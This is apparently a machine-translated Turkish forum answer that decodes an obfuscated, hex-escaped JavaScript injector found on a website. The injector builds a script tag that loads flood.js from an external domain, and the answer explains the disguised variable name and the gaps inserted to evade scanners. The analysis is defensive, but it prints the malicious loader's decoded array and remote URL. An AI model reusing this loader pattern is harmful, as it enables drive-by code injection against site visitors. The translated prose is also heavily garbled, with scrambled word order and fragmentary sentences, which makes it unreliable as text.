Firebug'u açtım ve komut dosyasının bir kısmını konsola yapıştırdım (yalnızca kod çalıştırmak yerine bir değişken oluşturan parçayı yapıştırmaya dikkat edin). Bu bende ne olduğunu:
Ben yapıştırılan Ne:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
sonucu: Kısacası
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
, uzak bir sunucudan harici JavaScript dosyası yüklemek için script gibi bu benzediğini çok tehlikeli görünümlü alan adı ile.
Ne beklediğinize dönüştürülmeyen birkaç karakter var. Bu, URL'ler veya createElement
vb. Için referanslar içeren komut dosyaları arayan herhangi bir otomatik kötü amaçlı yazılım denetleyicisini kandırmak için yazım hataları (olası değil) veya daha fazla gizleme olabilir. Geriye kalan yazı, bu karakterleri çalıştırmadan önce teker teker geri yerleştirir.
_0x8dd5
için seçilir değişken adı altıgen kodu gibi bakmak ve okumak için her şey daha zor hale, ama aslında o sadece normal bir JavaScript değişken bir isim. Kasten boşlukları düzeltmek için karakterleri dizenin bir bölümünden diğerine kopyalarken, komut dosyasının geri kalanında tekrar tekrar başvurulur.
Kesinlikle kötü amaçlı bir komut dosyası.
Hemen yanmasını öneriyorum!
var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];
Ben "kabaca" Ben verilerini ayrıştırmak için Chrome'un JavaScript konsolunu kullandığım için söylemek ve bazı şeyler: ;-)
Kesinlikle * * görünüyor. – Piskvor